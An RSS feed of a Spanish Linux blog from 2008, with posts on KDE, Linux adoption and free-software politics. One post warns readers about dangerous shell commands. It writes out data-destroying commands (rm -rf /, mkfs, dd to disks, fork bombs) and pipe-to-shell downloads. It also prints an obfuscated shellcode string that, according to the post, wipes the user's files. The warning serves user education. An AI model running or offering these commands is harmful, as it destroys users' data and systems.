<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:gd="http://schemas.google.com/g/2005" xmlns:georss="http://www.georss.org/georss" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-1939403793017189152</atom:id><lastBuildDate>Sun, 01 Sep 2024 14:40:26 +0000</lastBuildDate><category>"administración sana"</category><category>Linux</category><category>NWN-Live</category><category>kde desktop screenshots</category><category>*BSD</category><category>BSD</category><category>DesktopBSD</category><category>GNU</category><category>Noticias ATI Linux GNU aiglx Vista flgrx catalyst</category><category>Noticias Linux</category><category>Ubuntu</category><category>automatix 2 ubuntu gutsy</category><category>battle for wesnoth juegos gnu linux</category><category>bienvenidos</category><category>blog</category><category>compiz-fusion beryl instalar fusion-icon</category><category>desktop kde</category><category>encuesta desktop</category><category>gnu bash linux novatos scripting tutorial</category><category>gul linux howto</category><category>hacking psp linux</category><category>kde 4 3.5 downgrade archlinux</category><category>libertad RMS</category><category>linux gnu windows ventajas desventajas</category><category>linux libre gnu</category><category>mac os x apple x86 leopard rapidshare torrent hackingtosh</category><category>musica rock metal</category><category>noticias ambiente microsoft intel</category><category>nuevo</category><category>peyote</category><category>psp hacking custom firmware slim pandora</category><category>psp linux ultrapandora installer pandora magic custom firmware</category><category>revive pc linux</category><category>saludos</category><category>software libre</category><category>team</category><category>windows imac bsod</category><category>windows vs linux laboralmente</category><category>wireless linux</category><title>OverKiller - LTSmash's Blog</title><description>EL feed RSS del blog del software libre y Linux...</description><link>http://okltsmash.blogspot.com/</link><managingEditor>noreply@blogger.com (LTSmash)</managingEditor><generator>Blogger</generator><openSearch:totalResults>44</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-6022133781502067267</guid><pubDate>Thu, 13 Nov 2008 22:54:00 +0000</pubDate><atom:updated>2008-11-13T17:24:57.176-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">kde 4 3.5 downgrade archlinux</category><title>De vuelta en KDE 3.5</title><description>Así es, bueno, esto no lo he contado antes por que en realidad tengo el blog abandonado y me da weba actualizar, pero vale xD&lt;br /&gt;&lt;br /&gt;Hace tiempo, ArchLinux decidio mover KDE a la version 4, y desafortunadamente esto rompio mi sistema (ya que KDE4 no andaba y regresar a paquetes sin mantener de KDE 3.5 era torpe), de modo que tuve que reinstalar.&lt;br /&gt;Tras esto, el sistema ya permitio instalar rapidamente el nuevo KDe 4.1 y, pues la verdad no me gusto.&lt;br /&gt;&lt;br /&gt;Es inestable, pesado (a nivel de uso al menos, en memoria teoricamente se redujo el uso), y ademas sufre de dos detalles importantes: esta incompleto. Muchas aplicaciones no tienen la misma funcionalidad que en el anterior KDE, pero si tienen nuevas funcionalidades que reemplazan a las anteriores e incluso novedades, sin embargo es navaja de doble filo por que estas o bien no estan completamente implementadas o estan rotas.&lt;br /&gt;&lt;br /&gt;Es por ello que decidi recurrir al proyecto KDEmod, el cual mantiene un sistema KDE modular y con interesantes parches que usan otras grandes distros como kubuntu (claro, siempre que no rompan nada) y hacer de KDE 3 una mejor experiencia. Uno de los beneficios de KDEMod es que ellos estan manteniendo ambas ramas de KDE, mientras que ArchLinux solo soporta la ultima KDE 4.1 por ahora.&lt;br /&gt;&lt;br /&gt;He aqui unos screen de mi desktop ^-^&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://descargas.ltsmash.org/screens/kdemod-legacy-lts/instant%c3%a1nea2.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 1024px; height: 768px;" src="http://descargas.ltsmash.org/screens/kdemod-legacy-lts/instant%c3%a1nea2.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://descargas.ltsmash.org/screens/kdemod-legacy-lts/instant%c3%a1nea1.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 1024px; height: 768px;" src="http://descargas.ltsmash.org/screens/kdemod-legacy-lts/instant%c3%a1nea1.png" alt="" border="0" /&gt;&lt;/a&gt;</description><link>http://okltsmash.blogspot.com/2008/11/de-vuelta-en-kde-35.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-5086478134808625694</guid><pubDate>Sat, 18 Oct 2008 01:04:00 +0000</pubDate><atom:updated>2008-10-17T20:18:15.709-05:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">linux libre gnu</category><title>Razones por las cuales la gente no se pasa a GNU/Linux</title><description>En una larga entrevista concedida a la Linux Foundation, Linus Torvalds ha hablado del pasado, presente y futuro de Linux, y ha comentado las razones por las cuales según su opinión Linux sigue sin triunfar en el escritorio: la gente está contenta con cómo están las cosas.&lt;br /&gt;&lt;br /&gt;En la entrevista Torvalds confirmó que su verdadero interés era el de hacer que Linux triunfase en la informática personal, la informática de escritorio que usa la amplia mayoría de la gente. Sin embargo, las cosas no están saliendo como él podría desear, y eso se debe a una realidad eterna y palpable: mejor lo malo conocido que lo bueno por conocer, afirma en su entrevista con Linux Foundation.&lt;br /&gt;&lt;br /&gt;“Si haces cosas de forma distinta a Windows, incluso en el caso de que las hagas mejor, no importa. Lo mejor es peor si es diferente”&lt;br /&gt;&lt;br /&gt;El razonamiento de Linus es aplastante: no importa que Linux pueda ser mejor o peor: la inercia de los usuarios de Windows, que se encuentran a gusto con un sistema que les es muy familiar les impide considerar otras opciones, aunque estas sean mejores.&lt;br /&gt;&lt;br /&gt;“El escritorio es también el apartado en el que la gente se pone nerviosa si algo cambia, de modo que es realmente difícil entrar en este mercado por que la gente está acostumbrada a lo que sea que utilizaran antes, y en la mayoría de los casos eso es Windows”.&lt;br /&gt;&lt;br /&gt;De hecho, este razonamiento también se puede aplicar al reducido éxito de Windows Vista, un sistema operativo que tiene sus defectos pero que cuyo mayor problema es precisamente que algunos de los cambios han echado para atrás a los usuarios, que ya se habían acostumbrado a la forma de trabajar con Windows XP.&lt;br /&gt;&lt;br /&gt;Fuente: http://www.theinquirer.es/2008/02/08/linus_explica_porque_la_gente_no_se_pasa_a_linux.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;span style="font-style:italic;"&gt;Estos son comentarios sueltos sacados de esa discusión:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;"Los equipos van quedando obsoletos por muchos motivos, no solo es cuestión de recursos. Manejamos mas información que antes pero eso si, ¿manteniendo los tiempos de respuesta? entonces comienzan los problemas. Esto es igual en cualquier sistema operativo, si tu quieres manejar archivos mas grandes, necesitarás mas memoria, evidentemente y mas rapidez a la hora de leer o escribir datos en un disco duro, por tanto… influye la cantidad de memoria, la velocidad de la controladora, la velocidad del disco duro y la velocidad del procesador para mantener al maximo el nivel de todos los anteriores. Usamos codecs que nos permiten ver peliculas comprimidas para ser reproducidas desde un CD. Estos evolucionan, son mas complejos y nos piden un microprocesador mas elevado. Al ser un proceso crítico, no podemos pedir que nos vaya suministrando la información segun termine, si este no lo hace a tiempo, la pelicula no la ve ni dios a no ser que tengas los nerivos de acero.&lt;br /&gt;&lt;br /&gt;Que es cierto que no necesitamos tener un maquinon para ejecutar un programa a medida que no ha cambiado en los ultimos años, que ni siquiera evoluciona con los sistemas operativos, que permanece intacto con el paso de los años.&lt;br /&gt;&lt;br /&gt;El problema en ese caso comienza cuando ese ordenador que ejecuta esa aplicacion deja de funcionar, entonces te compras uno nuevo, lo mas normalito que encuentres en el mercado pero… vaya, otro problemas mas. Windows 95 no funciona con los equipos nuevos, da un pequeño problema, el famoso pantallazo azul y termina por reiniciarse. Los USB tienen algo que ver. Si no han pasado los años suficientes, tendras suerte con Windows 98, sino, tendrás otro problema similar. El motivo es que han eliminado la compatibilidad de las bios para esos sistemas operativos, dejando paso a los nuevos que están en el mercado. Terminas por instalarte Windows XP, pero el programa no es compatible porque el programador de turno, independiente, no ha evolucionado su software, ya que lo ha programado una vez en su vida y tan solo lo ha tocado para solucionar fallos.&lt;br /&gt;&lt;br /&gt;Terminas usando una maquina virtual para tener windows 95 instalado, por ejemplo. Funciona sin problemas exceptuando que… los ordenadores de hoy no tienen los mismos puertos que los de antes, dos com, uno de impresora. Pruebas con un “dongel” y no te funciona, el puerto aparentemente está ahí pero… el programa no va, otra vez en el punto inicial.&lt;br /&gt;&lt;br /&gt;¿Que ocurre? que siempre tienes que actualizarte, te guste o no. Sea porque Microsoft esté detrás de todo esto o porque los fabricantes, que tambien son empresas y viven de lo que venden, esten tan interesados como Microsoft en que el mercado no se detenga e imagino que de esto es de lo que trata el mundo entero aunque el software libre se empeñe en demostrar que esto no deba ser así.&lt;br /&gt;&lt;br /&gt;El mundo que hoy conocemos, que está basado en el capitalismo, lo unico que necesita para funcionar es dinero, el resto… les da exactamente igual.&lt;br /&gt;&lt;br /&gt;Es mi opinión y repito, mis argumentos no estan basados en ninguna intencion alguna de hacer ver que un sistema operativo es peor que otro, simplemente exponen lo que dicen, sin ningun doble sentido."&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;    * por Inconight&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;"La defensa de los usuarios de Windows se basa en la premisa falaz de “todo lo que hago en Windows que no puedo hacer en Linux”.&lt;br /&gt;&lt;br /&gt;Esto es porque “Linux no es Windows” (y nunca lo será).&lt;br /&gt;&lt;br /&gt;Es como si digo que Windows es una castaña, porque no puedo crear dos archivos con el mismo nombre, uno en mayúsculas y otro en minúsculas.&lt;br /&gt;&lt;br /&gt;Este es el típico rechazo de los usuarios reticentes a todo cambio. Es que con Outlook hacía tal y cual, pues bien, Thunderbird o Evolution no son Outlook y tienen cosas mejores y otras peores, por ejemplo los gestores de correo de Linux no se diseñaron para instalar virus con la misma facilidad que reciben el correo. El virus “I Love You” es una muestra de lo que digo.&lt;br /&gt;&lt;br /&gt;Yo he puesto Ubuntu en mi portátil y no he tenido que poner ni un solo driver propietario y me ha detectado la impresora, el escaner y ha puesto la resolución y el refresco de pantalla correctamente. Tardé 15 minutos en tenerlo todo operativo.&lt;br /&gt;&lt;br /&gt;Todavía recuerdo las horas y horas que me he tirado configurando drivers de pantalla en Windows como para que no me entre la risa leyendo lo que se dice aquí.&lt;br /&gt;&lt;br /&gt;He instalado Vmware player en mi Ubuntu sin problemas de ninguna clase, la primera vez desde Automatix y la segunda descargando un .deb de vmware.com, pero ahora uso Virtualbox por el mismo precio.&lt;br /&gt;&lt;br /&gt;En los años que he usado Windows (desde la versión que no era capaz de superponer ventanas), he tenido todo tipo de problemas, muchos de ellos con drivers, con todo tipo de programas, con incompatibilidad del hardware, con programas que instalas y dejan inservible todo, con fallos del sistema operativo y con espectros que sin explicación alguna dejaban el sistema operativo destrozado (y a reinstalarlo todo otra vez)…&lt;br /&gt;&lt;br /&gt;Cuantas veces habré oido lo de “Formatea y vuelve a instalarlo todo”.&lt;br /&gt;&lt;br /&gt;Me parece de chiste sacar a relucir lo difícil que es hacer algunas cosas con Linux, cuando Windows es el sistema operativo:&lt;br /&gt;&lt;br /&gt;- Que no aguanta encendido maś de dos días sin quedarse colgado.&lt;br /&gt;&lt;br /&gt;- Que se queda tostado en cuanto falla una aplicación.&lt;br /&gt;&lt;br /&gt;- En el que tienes que perder más tiempo en instalar antivirus y tapar agujeros que en trabajar.&lt;br /&gt;&lt;br /&gt;- Que tienes que reinstalar cada pocos meses (con suerte).&lt;br /&gt;&lt;br /&gt;- Que cada vez funciona más lento, hasta que terminas por reinstalarlo de nuevo para empezar el mismo círculo vicioso de nuevo.&lt;br /&gt;&lt;br /&gt;y encima, cada cosa que instalas es pirata o te cuesta una pasta.&lt;br /&gt;&lt;br /&gt;Si un usuario de Windows tuviera que pagar forzosamente los 500€ del Office, los 700€ del Photoshop, etc., simplemente se pasaría a Linux al día siguiente, pero para los fabricantes como Adobe. M$ y Autodesk es mucho mejor que la gente use copias piratas, así se acostumbran a sus programas y ellos pueden decir que tienen pérdidas astronómicas por la piratería, gran falacia que presupone que un usuario de una copia pirata habría pagado su precio de mercado.&lt;br /&gt;&lt;br /&gt;Al final, lo cierto es que el usuario medio de Windows se pasa el día descargando del P2P e instalando cracks, con el problema de seguridad que eso conlleva.&lt;br /&gt;&lt;br /&gt;Yo uso Ubuntu y he encontrado soluciones a todo lo que hacía, en un año que llevo usando Ubuntu en mi escritorio sólo hecho de menos un gestor de imágenes que se llama Compupic, del que tengo la licencia para Windows comprada desde principios de los 90, pero aun así, me arreglo con aplicaciones gratuitas.&lt;br /&gt;&lt;br /&gt;Es muy fácil decir que Openoffice no puede superar a M$ office 2007, pero no es cierto, Openoffice gana por goleada en consumo de recursos, velocidad y estabilidad y vale para el 99% de los usuarios exactamente igual y su precio es (en términos matemáticos exactos), infinitamente más barato.&lt;br /&gt;&lt;br /&gt;Me gustaría saber cuantos usuarios de M$ Office lo usarían si se vieran forzados a pagar la licencia (por ejemplo si M$ usara un sistema de protección imposible de saltar).&lt;br /&gt;&lt;br /&gt;Creo que este tipo de debates acaban siempre convertidos en un flame.&lt;br /&gt;&lt;br /&gt;Pues si, pero normal, porque hay quien se pone a escribir de forma subjetiva y falaz sobre el asunto.&lt;br /&gt;&lt;br /&gt;Trabajo de director técnico de una empresa TI desde 1989 y he tenido que dar soporte de cosas como Novell, Xenix y Windows.&lt;br /&gt;&lt;br /&gt;Durante años he instalado soluciones basadas en Windows para todo tipo de empresas (algunas muy grandes) y he conseguido que hicieran su trabajo, pero a base de muchas horas de técnicos trabajando.&lt;br /&gt;&lt;br /&gt;Nuestra solución definitiva para los usuarios de Windows es un sistema que hemos desarrollado consistente en guardar los datos de los usuarios en un servidor Linux y un sistema en el MBR que con un menú restaura una copia limpia de Windows en unos minutos.&lt;br /&gt;&lt;br /&gt;A los que se atreven, ahora les estamos instalando soluciones basadas en Linux, con los servidores es fácil, con el dinero de las licencias de Windows se paga el hardware y usar Linux es transparente para el usuario.&lt;br /&gt;&lt;br /&gt;En los escritorios el principal problema es la resistencia de los usuarios a cambiar a algo que no conocen, que normalmente termina en enfrentamientos con la directiva de algunos elementos ostiles y empecinados que siempre hay en toda empresa.&lt;br /&gt;&lt;br /&gt;He tenido algún caso en el que me han dado ganas de estrangular a alguien por una defensa irracional y falaz a más no poder de que no podían usar Linux+openoffice para enviar email y editar cuatro archivos.&lt;br /&gt;&lt;br /&gt;En el ámbito doméstico la gente que haga lo que quiera, pero en las empresas acabará ganando lo más práctico y barato antes o después.&lt;br /&gt;&lt;br /&gt;Creo que el único Windows que veremos en el futuro sera un “Windows GNU/Linux”. No me extrañaría que los de Redmon ya estuvieran trabajando en algo así."&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;    * por juanex&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;"Todos incluso los que usamos linux sabemos que los desarrolladores estan trabajando duramente (incluso sin paga) para arreglar los problemas de linux, que si son bastantes, pero cada vez menos.&lt;br /&gt;&lt;br /&gt;debes recordar que el objetivo de linux no es monopolizar, si no ser una alternativa. Cuando el mercado pase a 30% windows, 30% mac , 30% linux, y el 10% restante otros (libres o comerciales), ya habremos logrado nuestro objetivo.&lt;br /&gt;&lt;br /&gt;destruir a m$ no es un objetivo, sino que la gente no siga monopolizada por ellos."&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;    * por manny&lt;br /&gt;&lt;br /&gt;En resumen:&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;"Lo mejor es peor si es diferente”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;¿Es esta ideologia la que queremos?&lt;br /&gt;Habrá que tomar en cuenta que de aquí siempre ha partido todo lo que es humanamente malo: los nazis, la esclavitud a negros, el maltrato a irlandeses, la homofobia; practicamente TODO LO MORALMENTE INACEPTABLE viene de aquí. Y M$ no se queda atrás...</description><link>http://okltsmash.blogspot.com/2008/10/razones-por-las-cuales-la-gente-no-se.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-5880208511878091537</guid><pubDate>Sun, 20 Apr 2008 00:23:00 +0000</pubDate><atom:updated>2008-04-20T20:21:44.025-05:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">"administración sana"</category><title>Comandos peligrosos</title><description>Hay mucha gente que nos quiere joder el sistema, y por varios metodos nos quieren colar scripts o hacernos meter comandos riesgozos en una terminal. El objetivo de este texto (obtenido de la comunidad de Ubuntu en inglés) es hacernos mas concientes de los peligrosos comandos en la red y como evitarlos.&lt;br /&gt;&lt;br /&gt;- Estos comandos pueden borrar todo lo que encuentren o tengan permisos para escribir.&lt;br /&gt;&lt;br /&gt;Código:&lt;br /&gt;rm -rf /&lt;br /&gt;rm -rf .&lt;br /&gt;rm -rf *&lt;br /&gt;&lt;br /&gt;Este comando borrará todos los archivos ocultos en el directorio actual:&lt;br /&gt;&lt;br /&gt;Código:&lt;br /&gt;rm -r .*&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El Siguiente comando borrará todo lo que que está en una carpeta y sus contenidos: &lt;br /&gt;&lt;br /&gt;Código:&lt;br /&gt;rm -r .[^.]*&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Estos comandos se meten con tus sistemas de ficheros dañando los datos que tengas:&lt;br /&gt;&lt;br /&gt;Código:&lt;br /&gt;mkfs&lt;br /&gt;mkfs.ext3&lt;br /&gt;mkfs.anything&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Manipulacion de bloques en los dispositivos: provoca que datos RAW sean escritos en un bloque del dispositivo, a veces provoca la pérdida de todos tus datos por abuso del sistema de ficheros:&lt;br /&gt;&lt;br /&gt;Código:&lt;br /&gt;any_command &gt; /dev/sda&lt;br /&gt;dd if=something of=/dev/sda&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Forkbomb: Es un comando que repite procesos de forma infinita hasta congelar el sistema y obligarte a hacer un hard reset, provocando posibles pérdidas de datos:&lt;br /&gt;&lt;br /&gt;Código:&lt;br /&gt;:(){:|:&amp;};:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Una forkbomb en Perl:&lt;br /&gt;&lt;br /&gt;Código:&lt;br /&gt;fork while fork&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Tarbomb: Son archivos tar que al descomprimirse en una carpeta ya existente sobreescriben ficheros y hacen muchos nuevos de forma enfermiza, para evitar esto siempre hay que extraer los ficheros comprimidos en un nuevo directorio limpio.&lt;br /&gt;&lt;br /&gt;Decompression bomb: Similar al Tarbomb, estos archivos aparentan ser muy pequeños pero al descomprimirlos llenan tu disco con &lt;br /&gt;&lt;br /&gt;Shellscript: A veces alguien te da un enlace para que ejecutes un shellscript. Esto puede contener cualquier comando que comience con -- . No confies y no ejecutes codigos que no estes seguro de su confiabilidad. &lt;br /&gt;&lt;br /&gt;Código:&lt;br /&gt;wget http://some_place/some_file&lt;br /&gt;sh ./some_file&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Código:&lt;br /&gt;wget http://some_place/some_file -O- | sh&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Compilando desde las fuentes: Un problema muy común, donde alguien simplemente te da el código fuente de alguna aplicación y te dice que lo compiles. Al hacer esto comprometes tu equipo puesto que es muy facil ocultar código malicioso en las grandes cantidades de código que por lo general una aplicación o librería tiene. Es por ello que lo mejor es siempre obtener y compilar nuestro software desde fuentes confibles (como la web del autor o SourceForge).&lt;br /&gt;&lt;br /&gt;Shellcodes: Una shellcode es un conjunto de órdenes programadas generalmente en lenguaje ensamblador que se inyectan en la pila para conseguir que la máquina en la que reside se ejecute la operación que se haya programado. Se utilizan para ejecutar código aprovechando ciertas vulnerabilidades exploit en el código llamadas desbordamiento de búfer. Principalmente el shellcode se programa para permitir ejecutar un intérprete de comandos en el equipo afectado.&lt;br /&gt;&lt;br /&gt;Código:&lt;br /&gt;char esp[] __attribute__ ((section(".text"))) /* e.s.p&lt;br /&gt;release */&lt;br /&gt; = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"&lt;br /&gt; "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"&lt;br /&gt; "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"&lt;br /&gt; "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"&lt;br /&gt; "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"&lt;br /&gt; "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"&lt;br /&gt; "\x6e\x2f\x73\x68\x00\x2d\x63\x00"&lt;br /&gt; "cp -p /bin/sh /tmp/.beyond; chmod 4755&lt;br /&gt;/tmp/.beyond;";&lt;br /&gt;&lt;br /&gt;Esto ultimo en realidad ejecuta 'rm -rf ~ / &amp;', lo cual destruirá todos tus ficheros como usuario regular y todo tu sistema de archivos si eres root. Es por ello que JAMÁS debes confiar en los shellcodes, que aunque para un novato puedan parecer una geekeada hexadecimal es en realidad un peligroso comando.&lt;br /&gt;&lt;br /&gt;_________________________________________________________________&lt;br /&gt;&lt;br /&gt;En resumen, la seguridad en cualquier sistema UNIX, depende mucho de la cautela de su administrador, evitando usar estos comandos y siguiendo las sugerencias nos acercamos a un sistema mas sano.</description><link>http://okltsmash.blogspot.com/2008/04/vamos-empezar-la-serie-de-administracin.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-8126489051489631219</guid><pubDate>Sun, 20 Apr 2008 00:20:00 +0000</pubDate><atom:updated>2008-04-19T19:23:19.057-05:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">"administración sana"</category><title>Administración sana de nuestro UNIX</title><description>Saludos.&lt;br /&gt;&lt;br /&gt;Se que tengo tiempo sin publicar algo, y se que esto ya tiene tiempo sucediendo, y es que me da flojera estar actualizando el puto blog.&lt;br /&gt; &lt;br /&gt;En fin, para no marearlos con el clasico bloggero "no tengo oportunidad/tiempo/ganas/ideas para actualizar" mejor vamos al tema directamente.&lt;br /&gt;&lt;br /&gt;Esta vez voy a abrir una nueva serie llamada "Administración Sana para Sistemas UNIX", en la cual basicamente hablaré sobre como hacer nuestro sistema mas solido y seguro.&lt;br /&gt;&lt;br /&gt;Espero retroalimentación de ser posible xD...</description><link>http://okltsmash.blogspot.com/2008/04/administracin-sana-de-nuestro-unix.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-6764710686752488429</guid><pubDate>Fri, 11 Apr 2008 20:14:00 +0000</pubDate><atom:updated>2008-04-11T15:16:06.562-05:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">libertad RMS</category><title>Computacion Confiable [TC] o ¿Computacion Traicionera?</title><description>¿De quién debería recibir órdenes su computadora? Mucha gente piensa que sus computadoras deberían obedecerles a ellos, en vez de a otras personas. Mediante un plan al que llaman "computación confiable" ("trusted computing", en inglés), grandes corporaciones de los medios de comunicación (incluyendo las compañías cinematográficas y de la industria discográfica) junto con compañías de computadoras tales como Microsoft e Intel, están planificando hacer que su computadora los obedezca a ellos en vez de a usted. (La versión de Microsoft de este esquema se llama "Palladium"). Los programas privativos han incluido características maliciosas en el pasado, pero este plan haría esto universal. &lt;br /&gt; Software privativo significa, fundamentalmente, que usted no controla lo que hace; no puede estudiar el código fuente o modificarlo. No es sorprendente que hábiles hombres de negocios encuentren formas de usar su control para ponerle a usted en desventaja. Microsoft ha hecho esto varias veces; una versión de Windows fue diseñada para reportar a Microsoft todo el software en su disco duro; una reciente actualización de "seguridad" en el Reproductor Multimedia de Windows requería que los usuarios aceptaran nuevas restricciones. Pero Microsoft no está solo: el software para intercambio de música KaZaa está diseñado de forma que un asociado de negocios de KaZaa pueda alquilar el uso de su computadora a sus clientes. Estas características maliciosas son normalmente secretas, pero una vez que usted se entera de ellas es difícil eliminarlas, dado que no dispone del código fuente. &lt;br /&gt; En el pasado, estos fueron incidentes aislados. "Computación confiable" los haría omnipresentes. "Computación traidora" es un nombre más apropiado, porque el plan está diseñado para asegurarse de que su computadora sistemáticamente lo desobedecerá. De hecho, está diseñado para que la misma deje de funcionar como una computadora de propósito general. Cada operación puede requerir de una autorización explícita. &lt;br /&gt; La idea técnica detrás de la computación traidora es que la computadora incluye un dispositivo de cifrado y firma digital, y las claves se mantienen secretas para usted. Los programas privativos usan este dispositivo para controlar qué otros programas puede ejecutar, a qué documentos o datos puede acceder y a qué programas se los puede transferir. Esos programas continuamente descargarán nuevas reglas de autorización a través de Internet, e impondrán dichas reglas automáticamente a su trabajo. Si usted no permite a su computadora obtener las nuevas reglas periódicamente de Internet, algunas capacidades dejarán automáticamente de funcionar. &lt;br /&gt; Por supuesto, Hollywood y las compañías discográficas planean usar la computación traidora para "DRM" ("Administración de Restricciones Digitales" o "Digital Restriction Management", en inglés), así los vídeos y la música descargados podrán ser reproducidos sólo en una computadora específica. Compartir será completamente imposible, al menos usando los archivos autorizados que deberá obtener de dichas compañías. Usted, el público, debería tener la libertad y la habilidad de compartir esas cosas. (Espero que alguien encuentre la forma de producir versiones no cifradas, y de subirlas y compartirlas, así DRM no tendrá éxito completamente, pero esto no es excusa para el sistema). &lt;br /&gt; Hacer imposible el compartir ya es lo suficientemente malo, pero se pone peor. Existen planes para usar la misma facilidad al enviar documentos por correo electrónico -- resultando en mensajes que desaparecen en dos semanas, o documentos que sólo pueden ser leídos en las computadoras de determinada compañía. &lt;br /&gt; Imagínese si usted recibiera un mensaje de correo electrónico de su jefe diciéndole que haga algo que usted piensa que es arriesgado; un mes después, cuando el tiro sale por la culata no puede usar el mensaje para mostrar que la decisión no fue suya. "Ponerlo por escrito" no lo protege si la orden está escrita en tinta que desaparece. &lt;br /&gt; Imagínese si usted recibe un mensaje de correo electrónico de su jefe estableciendo una política que es ilegal o inmoral, tal como destrozar los documentos de auditoría de su compañía, o permitir que una amenaza peligrosa para su país avance sin ser controlada. Actualmente, usted puede enviar esto a un periodista y exponer la actividad. Con la computación traidora, el periodista no será capaz de leer el documento; su computadora se negará a obedecerlo. La computación traidora se transforma en un paraíso para la corrupción. &lt;br /&gt; Los procesadores de texto tales como Microsoft Word podrían usar la computación traidora cuando usted guarde sus documentos, para asegurarse de que ningún procesador de texto de la competencia podrá leerlos. Actualmente debemos averiguar los secretos del formato de Word mediante laboriosos experimentos, para que los procesadores libres puedan leer documentos de Word. Si Word cifra los documentos usando computación traidora cuando los guarda, la comunidad del software libre no tendrá la posibilidad de desarrollar software para leerlos -- y si pudiéramos, tales programas podrían ser prohibidos por la Digital Millennium Copyright Act (Ley de Copyright del Milenio Digital). &lt;br /&gt; Los programas que usen computación traidora continuamente descargarán nuevas reglas de autorización desde Internet, e impondrán dichas reglas a su trabajo. Si a Microsoft, o al gobierno de los EEUU no les agrada lo que usted dice en un documento que escribió, podrán publicar nuevas restricciones diciendo a todas las computadoras que se rehusen a dejar que alguien lea dicho documento. Cada computadora del mundo obedecerá cuando descargue las nuevas instrucciones. Su escrito estará sujeto a un borrado retroactivo estilo 1984. Hasta usted podría ser incapaz de leerlo. &lt;br /&gt; Podría pensar que usted puede averiguar que cosas sucias hace una aplicación de computación traidora, estudiar qué tan dañinas son, y decidir si aceptarlas. Sería ingenuo aceptarlo, pero el punto es que el trato que cree que está haciendo no se mantendrá. Una vez que usted dependa del uso del programa, estará enganchado y ellos lo saben; entonces pueden cambiar el trato. Algunas aplicaciones automáticamente bajarán actualizaciones que harán algo diferente -- y no le darán la posibilidad de elegir si desea la actualización o no. &lt;br /&gt; Actualmente puede evitar ser restringido por software privativo no usándolo. Si ejecuta GNU/Linux u otro sistema operativo libre, y si evita instalar aplicaciones propietarias sobre él, entonces usted está al mando de lo que su computadora hace. Si un programa libre tiene una característica maliciosa, otros desarrolladores en la comunidad la quitarán y usted puede usar la versión corregida. Puede también ejecutar aplicaciones y herramientas libres en sistemas operativos no libres; esto falla completamente en darle libertad, pero muchos usuarios lo hacen. &lt;br /&gt; La computación traidora pone en peligro la existencia de sistemas operativos y aplicaciones libres, porque usted ya no podrá ejecutarlas. Algunas versiones de la computación traidora requerirán que el sistema operativo esté específicamente autorizado por una compañía particular. Los sistemas operativos libres no podrán ser instalados. Algunas versiones de la computación traidora requerirán que cada programa sea específicamente autorizado por el desarrollador del sistema operativo. No podrá ejecutar aplicaciones libres en tales sistemas. Si usted averigua cómo hacerlo y se lo dice a alguien, eso podría constituir un delito. &lt;br /&gt; Existen proyectos de ley en EEUU que requieren que todas las computadoras soporten computación traidora, y que se prohiba la conexión de computadoras antiguas a Internet. La CBDTPA (la llamamos Ley Consuma Pero No Trate de Programar, Consume But Don't Try Programming Act, en inglés) es uno de ellos. Pero inclusive si no lo fuerzan legalmente a migrar hacia la computación traidora, la presión para aceptarla puede ser enorme. Actualmente las personas usualmente utilizan el formato Word para comunicarse, aunque esto causa varios tipos de problemas (vea "Podemos Acabar con los Archivos Adjuntos en Word"). Si solamente una máquina de computación traidora puede leer los últimos documentos de Word, mucha gente migrará hacia ella, si ven la situación sólo en términos de acción individual (tómalo o déjalo). Para oponernos a la computación traidora, debemos 